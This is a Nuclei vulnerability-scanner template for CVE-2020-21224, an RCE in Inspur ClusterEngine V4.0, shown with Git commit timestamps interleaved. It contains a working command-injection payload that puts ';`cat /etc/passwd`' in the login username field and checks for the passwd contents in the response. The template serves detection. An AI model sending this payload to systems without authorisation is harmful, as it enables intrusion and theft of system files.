nuclei-templates/cves/2020/CVE-2020-21224.yaml

33 lines
831 B
YAML
Raw Normal View History

2021-03-03 13:44:11 +00:00
id: CVE-2020-21224
info:
2021-03-03 20:26:35 +00:00
name: Inspur ClusterEngine V4.0 RCE
2021-03-03 13:44:11 +00:00
author: pikpikcu
severity: critical
2021-03-24 06:50:41 +00:00
description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server
2021-03-03 13:44:11 +00:00
reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
tags: cve,cve2020,clusterengine,rce
requests:
- method: POST
path:
2021-03-16 10:38:58 +00:00
- "{{BaseURL}}/login"
headers:
2021-03-17 09:56:31 +00:00
Content-Type: application/x-www-form-urlencoded
Referer: "{{Hostname}}/module/login/login.html"
2021-03-16 10:38:58 +00:00
body: |
2021-03-17 09:56:31 +00:00
op=login&username=;`cat /etc/passwd`&password=
2021-03-03 13:44:11 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-03-03 13:44:11 +00:00
part: body
- type: status
status:
2021-03-16 10:38:58 +00:00
- 200